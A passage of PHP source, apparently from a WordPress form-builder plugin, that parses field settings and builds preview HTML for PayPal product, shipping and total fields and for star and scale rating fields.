			  if(strpos($temp, 'w_choices_params') > -1)
						$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_price','w_choices_checked', 'w_choices_disabled','w_required','w_quantity', 'w_quantity_value', 'w_choices_params', 'w_class', 'w_property', 'w_property_values');	
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);
                 
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
                 
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
                
              $param['w_choices_disabled']	= explode('***',$param['w_choices_disabled']);
              $param['w_property']	= explode('***',$param['w_property']);
              $param['w_property_values']	= explode('***',$param['w_property_values']);
             if(isset($param['w_choices_params']))
						$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='selected="selected"';
                else
                  $param['w_choices_checked'][$key]='';
              }

              
              $rep='<div id="wdform_field'.$id.'" type="type_paypal_select" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; "><input type="hidden" value="type_paypal_select" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><select id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" onchange="set_select(this)" style="width: '.$param['w_size'].'px;"  '.$param['attributes'].' disabled>';
					foreach($param['w_choices'] as $key => $choice)
					{
						$where = '';
						$order_by = '';
						$db_info = '';
						$choice_value = $param['w_choices_disabled'][$key]=="true" ? '' : $param['w_choices_price'][$key];
							
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = "where='".$w_choices_params[0]."'";
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = "order_by='".$w_choices_params[0]."'";
							$db_info = "db_info='".$w_choices_params[1]."'";
						}	
						 $rep.='<option id="'.$id.'_option'.$key.'" value="'.$choice_value.'" onselect="set_select(&quot;'.$id.'_option'.$key.'&quot;)" '.$param['w_choices_checked'][$key].' '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</option>';
					}
					$rep.='</select><div id="'.$id.'_divform_id_temp">';
					if($param['w_quantity']=="yes")
						$rep.='<span id="'.$id.'_element_quantity_spanform_id_temp" style="margin-right: 15px;"><label class="mini_label" id="'.$id.'_element_quantity_label_form_id_temp" style="margin-right: 5px;"><!--repstart-->Quantity<!--repend--></label><input type="text" value="'.$param['w_quantity_value'].'" id="'.$id.'_element_quantityform_id_temp" name="'.$id.'_element_quantityform_id_temp" onkeypress="return check_isnum(event)" onchange="change_value(&quot;'.$id.'_element_quantityform_id_temp&quot;, this.value)" style="width: 30px; margin: 2px 0px;" disabled /></span>';
					if($param['w_property'][0])					
					foreach($param['w_property'] as $key => $property)
					{
	
					$rep.='
					<span id="'.$id.'_property_'.$key.'" style="margin-right: 15px;">
					
					<label class="mini_label" id="'.$id.'_property_label_form_id_temp'.$key.'" style="margin-right: 5px;">'.$property.'</label>
					<select id="'.$id.'_propertyform_id_temp'.$key.'" name="'.$id.'_propertyform_id_temp'.$key.'" style="width: auto; margin: 2px 0px;" disabled>';
					$param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);
					$param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   
					foreach($param['w_property_values'][$key] as $subkey => $property_value)
					{
						$rep.='<option id="'.$id.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'">'.$property_value.'</option>';
					}
					$rep.='</select></span>';
					}
					
					$rep.='</div></div></div>';
					break;
            }
            
            case 'type_paypal_checkbox':
            {
                        
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class','w_property','w_property_values','w_quantity','w_quantity_value');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
						$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_choices_params', 'w_class','w_property','w_property_values','w_quantity','w_quantity_value');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
						
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);				   
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);					
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);		  
              $param['w_property']	= explode('***',$param['w_property']);
              $param['w_property_values']	= explode('***',$param['w_property_values']);
			  
              if(isset($param['w_choices_params']))
						$param['w_choices_params']	= explode('***',$param['w_choices_params']);
					
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='checked="checked"';
                else
                  $param['w_choices_checked'][$key]='';
              }
              
              $rep='<div id="wdform_field'.$id.'" type="type_paypal_checkbox" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="wd_form_label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_paypal_checkbox" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_randomize'].'" name="'.$id.'_randomizeform_id_temp" id="'.$id.'_randomizeform_id_temp"><input type="hidden" value="'.$param['w_allow_other'].'" name="'.$id.'_allow_otherform_id_temp" id="'.$id.'_allow_otherform_id_temp"><input type="hidden" value="'.$param['w_allow_other_num'].'" name="'.$id.'_allow_other_numform_id_temp" id="'.$id.'_allow_other_numform_id_temp"><input type="hidden" value="'.$param['w_field_option_pos'].'" id="'.$id.'_option_left_right"><div style="display: table;"><div id="'.$id.'_table_little" style="display: table-row-group;">';
				
					if($param['w_flow']=='hor')
					{
						$rep.= '<div id="'.$id.'_hor" style="display: table-row;">';
						foreach($param['w_choices'] as $key => $choice)
						{
						    $where ='';
							$order_by ='';
							$db_info = '';
							if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
							{
								$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
								$where = "where='".$w_choices_params[0]."'";
								$w_choices_params = explode('[db_info]',$w_choices_params[1]);
								$order_by = "order_by='".$w_choices_params[0]."'";
								$db_info = "db_info='".$w_choices_params[1]."'";
							}
						
							$rep.='<div valign="top" id="'.$id.'_td_little'.$key.'" idi="'.$key.'" style="display: table-cell;"><input type="checkbox" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp'.$key.'" value="'.$param['w_choices_price'][$key].'" onclick="set_checked(&quot;'.$id.'&quot;,&quot;'.$key.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$key].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$key.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$key.'" '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</label></div>';
						}
						$rep.= '</div>';
					}
					else
					{
						
						foreach($param['w_choices'] as $key => $choice)
						{
						$where ='';
							$order_by ='';
							$db_info ='';
							if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
							{
								$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
								$where = "where='".$w_choices_params[0]."'";
								$w_choices_params = explode('[db_info]',$w_choices_params[1]);
								$order_by = "order_by='".$w_choices_params[0]."'";
								$db_info = "db_info='".$w_choices_params[1]."'";
							}
						
							$rep.='<div id="'.$id.'_element_tr'.$key.'" style="display: table-row;"><div valign="top" id="'.$id.'_td_little'.$key.'" idi="'.$key.'" style="display: table-cell;"><input type="checkbox" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp'.$key.'" value="'.$param['w_choices_price'][$key].'" onclick="set_checked(&quot;'.$id.'&quot;,&quot;'.$key.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$key].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$key.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$key.'" '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</label></div></div>';		
					    }
						
					}
					$rep.='</div></div>';

					$rep.='<div id="'.$id.'_divform_id_temp">';
					if($param['w_quantity']=="yes")
						$rep.='<span id="'.$id.'_element_quantity_spanform_id_temp" style="margin-right: 15px;"><label class="mini_label" id="'.$id.'_element_quantity_label_form_id_temp" style="margin-right: 5px;"><!--repstart-->Quantity<!--repend--></label><input type="text" value="'.$param['w_quantity_value'].'" id="'.$id.'_element_quantityform_id_temp" name="'.$id.'_element_quantityform_id_temp" onkeypress="return check_isnum(event)" onchange="change_value(&quot;'.$id.'_element_quantityform_id_temp&quot;, this.value)" style="width: 30px; margin: 2px 0px;" disabled/></span>';
					if($param['w_property'][0])					
					foreach($param['w_property'] as $key => $property)
					{
					$rep.='
					<span id="'.$id.'_property_'.$key.'" style="margin-right: 15px;">
					
					<label class="mini_label" id="'.$id.'_property_label_form_id_temp'.$key.'" style="margin-right: 5px;">'.$property.'</label>
					<select id="'.$id.'_propertyform_id_temp'.$key.'" name="'.$id.'_propertyform_id_temp'.$key.'" style="width: auto; margin: 2px 0px;" disabled>';
					$param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);
					$param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   
					foreach($param['w_property_values'][$key] as $subkey => $property_value)
					{
						$rep.='<option id="'.$id.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'">'.$property_value.'</option>';
					}
					$rep.='</select></span>';
					}
					
					$rep.='</div></div></div>';
					break;
            }
            case 'type_paypal_radio':
            {
              
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class','w_property','w_property_values','w_quantity','w_quantity_value');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
						$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_choices_params', 'w_class','w_property','w_property_values','w_quantity','w_quantity_value');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
             if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);
                 
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
              
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
                
              $param['w_property']	= explode('***',$param['w_property']);
              $param['w_property_values']	= explode('***',$param['w_property_values']);
			  
              if(isset($param['w_choices_params']))
						$param['w_choices_params']	= explode('***',$param['w_choices_params']);
						
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='checked="checked"';
                else
                  $param['w_choices_checked'][$key]='';
              }
              
              $rep='<div id="wdform_field'.$id.'" type="type_paypal_radio" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="wd_form_label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_paypal_radio" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_randomize'].'" name="'.$id.'_randomizeform_id_temp" id="'.$id.'_randomizeform_id_temp"><input type="hidden" value="'.$param['w_allow_other'].'" name="'.$id.'_allow_otherform_id_temp" id="'.$id.'_allow_otherform_id_temp"><input type="hidden" value="'.$param['w_allow_other_num'].'" name="'.$id.'_allow_other_numform_id_temp" id="'.$id.'_allow_other_numform_id_temp"><input type="hidden" value="'.$param['w_field_option_pos'].'" id="'.$id.'_option_left_right"><div style="display: table;"><div id="'.$id.'_table_little" style="display: table-row-group;">';
				
				if($param['w_flow']=='hor')
				{
					$rep.= '<div id="'.$id.'_hor" style="display: table-row;">';
					foreach($param['w_choices'] as $key => $choice)
					{
					$where ='';
						$order_by ='';
						$db_info ='';
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = "where='".$w_choices_params[0]."'";
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = "order_by='".$w_choices_params[0]."'";
							$db_info = "db_info='".$w_choices_params[1]."'";
						}
						
						$rep.='<div valign="top" id="'.$id.'_td_little'.$key.'" idi="'.$key.'" style="display: table-cell;"><input type="radio" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp" value="'.$param['w_choices_price'][$key].'" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.$key.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$key].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$key.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$key.'" '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</label></div>';
					}
					$rep.= '</div>';
				}
				else
				{
					
					foreach($param['w_choices'] as $key => $choice)
					{
					
						$where ='';
						$order_by ='';
						$db_info ='';
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = "where='".$w_choices_params[0]."'";
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = "order_by='".$w_choices_params[0]."'";
							$db_info = "db_info='".$w_choices_params[1]."'";
						}
						
						$rep.='<div id="'.$id.'_element_tr'.$key.'" style="display: table-row;"><div valign="top" id="'.$id.'_td_little'.$key.'" idi="'.$key.'" style="display: table-cell;"><input type="radio" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp" value="'.$param['w_choices_price'][$key].'" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.$key.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$key].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$key.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$key.'" '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</label></div></div>';				
					}
					
				}
					$rep.='</div></div>';

					$rep.='<div id="'.$id.'_divform_id_temp">';
					if($param['w_quantity']=="yes")
						$rep.='<span id="'.$id.'_element_quantity_spanform_id_temp" style="margin-right: 15px;"><label class="mini_label" id="'.$id.'_element_quantity_label_form_id_temp" style="margin-right: 5px;"><!--repstart-->Quantity<!--repend--></label><input type="text" value="'.$param['w_quantity_value'].'" id="'.$id.'_element_quantityform_id_temp" name="'.$id.'_element_quantityform_id_temp" onkeypress="return check_isnum(event)" onchange="change_value(&quot;'.$id.'_element_quantityform_id_temp&quot;, this.value)" style="width: 30px; margin: 2px 0px;" disabled/></span>';
					if($param['w_property'][0])					
					foreach($param['w_property'] as $key => $property)
					{
					$rep.='
					<span id="'.$id.'_property_'.$key.'" style="margin-right: 15px;">
					
					<label class="mini_label" id="'.$id.'_property_label_form_id_temp'.$key.'" style="margin-right: 5px;">'.$property.'</label>
					<select id="'.$id.'_propertyform_id_temp'.$key.'" name="'.$id.'_propertyform_id_temp'.$key.'" style="width: auto; margin: 2px 0px;" disabled>';
					$param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);
					$param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   
					foreach($param['w_property_values'][$key] as $subkey => $property_value)
					{
						$rep.='<option id="'.$id.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'">'.$property_value.'</option>';
					}
					$rep.='</select></span>';
					}
					
					$rep.='</div></div></div>';
				
					break;
            }
            case 'type_paypal_shipping':
            {
              
              $params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos', 'w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_choices_params','w_class');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
						
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_choices']	= explode('***',$param['w_choices']);
                 
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
              
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
                
              if(isset($param['w_choices_params']))
						$param['w_choices_params']	= explode('***',$param['w_choices_params']); 
						
              foreach($param['w_choices_checked'] as $key => $choices_checked )
              {
                if($choices_checked=='true')
                  $param['w_choices_checked'][$key]='checked="checked"';
                else
                  $param['w_choices_checked'][$key]='';
              }
              
              $rep='<div id="wdform_field'.$id.'" type="type_paypal_shipping" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="wd_form_label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; vertical-align:top;"><input type="hidden" value="type_paypal_shipping" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_randomize'].'" name="'.$id.'_randomizeform_id_temp" id="'.$id.'_randomizeform_id_temp"><input type="hidden" value="'.$param['w_allow_other'].'" name="'.$id.'_allow_otherform_id_temp" id="'.$id.'_allow_otherform_id_temp"><input type="hidden" value="'.$param['w_allow_other_num'].'" name="'.$id.'_allow_other_numform_id_temp" id="'.$id.'_allow_other_numform_id_temp"><input type="hidden" value="'.$param['w_field_option_pos'].'" id="'.$id.'_option_left_right"><div style="display: table;"><div id="'.$id.'_table_little" style="display: table-row-group;">';
				
				if($param['w_flow']=='hor')
				{
					$rep.= '<div id="'.$id.'_hor" style="display: table-row;">';
					foreach($param['w_choices'] as $key => $choice)
					{
					    $where ='';
						$order_by ='';
						$db_info ='';
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = "where='".$w_choices_params[0]."'";
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = "order_by='".$w_choices_params[0]."'";
							$db_info = "db_info='".$w_choices_params[1]."'";
						}
						
						$rep.='<div valign="top" id="'.$id.'_td_little'.$key.'" idi="'.$key.'" style="display: table-cell;"><input type="radio" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp" value="'.$param['w_choices_price'][$key].'" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.$key.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$key].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$key.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$key.'" '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</label></div>';
					}
					$rep.= '</div>';
				}
				else
				{
					
					foreach($param['w_choices'] as $key => $choice)
					{
					$where ='';
						$order_by ='';
						$db_info =''; 
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = "where='".$w_choices_params[0]."'";
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = "order_by='".$w_choices_params[0]."'";
							$db_info = "db_info='".$w_choices_params[1]."'";
						}
					
						$rep.='<div id="'.$id.'_element_tr'.$key.'" style="display: table-row;"><div valign="top" id="'.$id.'_td_little'.$key.'" idi="'.$key.'" style="display: table-cell;"><input type="radio" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp" value="'.$param['w_choices_price'][$key].'" onclick="set_default(&quot;'.$id.'&quot;,&quot;'.$key.'&quot;,&quot;form_id_temp&quot;)" '.$param['w_choices_checked'][$key].' '.$param['attributes'].' '.($param['w_field_option_pos']=='right' ? 'style="float:left !important;"' : "").' disabled/><label id="'.$id.'_label_element'.$key.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$key.'" '.$where.' '.$order_by.' '.$db_info.'>'.$choice.'</label></div></div>';
					}
					
				}
					$rep.='</div></div>';

					$rep.='</div></div>';
				
					break;
            }
            case 'type_paypal_total':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
            
                    
                      
              $rep='<div id="wdform_field'.$id.'" type="type_paypal_total" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_paypal_total" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div id="'.$id.'paypal_totalform_id_temp" class="wdform_paypal_total paypal_totalform_id_temp"><input type="hidden" value="" name="'.$id.'_paypal_totalform_id_temp" class="input_paypal_totalform_id_temp"><div id="'.$id.'div_totalform_id_temp" class="div_totalform_id_temp" style="margin-bottom: 10px;"><!--repstart-->$300<!--repend--></div><div id="'.$id.'paypal_productsform_id_temp" class="paypal_productsform_id_temp" style="border-spacing: 2px;"><div style="border-spacing: 2px;"><!--repstart-->product 1 $100<!--repend--></div><div style="border-spacing: 2px;"><!--repstart-->product 2 $200<!--repend--></div></div><div id="'.$id.'paypal_taxform_id_temp" class="paypal_taxform_id_temp" style="border-spacing: 2px; margin-top: 7px;"></div></div></div></div>';
            
            
              break;
            }

            case 'type_star_rating':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_label_col','w_star_amount','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");
              
      
            $images = '';	
              for($i=0; $i<$param['w_star_amount']; $i++)
              {
                $images .= '<img id="'.$id.'_star_'.$i.'" src="' . WD_FMC_URL . '/images/star.png?ver='. get_option("wd_form_maker_version").'" onmouseover="change_src('.$i.','.$id.',&quot;form_id_temp&quot;)" onmouseout="reset_src('.$i.','.$id.')" onclick="select_star_rating('.$i.','.$id.', &quot;form_id_temp&quot;)">';
              }
              
              $rep ='<div id="wdform_field'.$id.'" type="type_star_rating" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_star_rating" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_star_amount'].'" id="'.$id.'_star_amountform_id_temp" name="'.$id.'_star_amountform_id_temp"><input type="hidden" value="'.$param['w_field_label_col'].'" name="'.$id.'_star_colorform_id_temp" id="'.$id.'_star_colorform_id_temp"><div id="'.$id.'_elementform_id_temp" class="wdform_stars" '.$param['attributes'].'>'.$images.'</div></div></div>';
              
              
              break;
            }
            case 'type_scale_rating':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_mini_labels','w_scale_amount','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");
              
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              
              $numbers = '';	
              for($i=1; $i<=$param['w_scale_amount']; $i++)
              {
                $numbers .= '<div id="'.$id.'_scale_td1_'.$i.'form_id_temp" style="text-align: center; display: table-cell;"><span>'.$i.'</span></div>';
              }
              
                        
              $radio_buttons = '';	
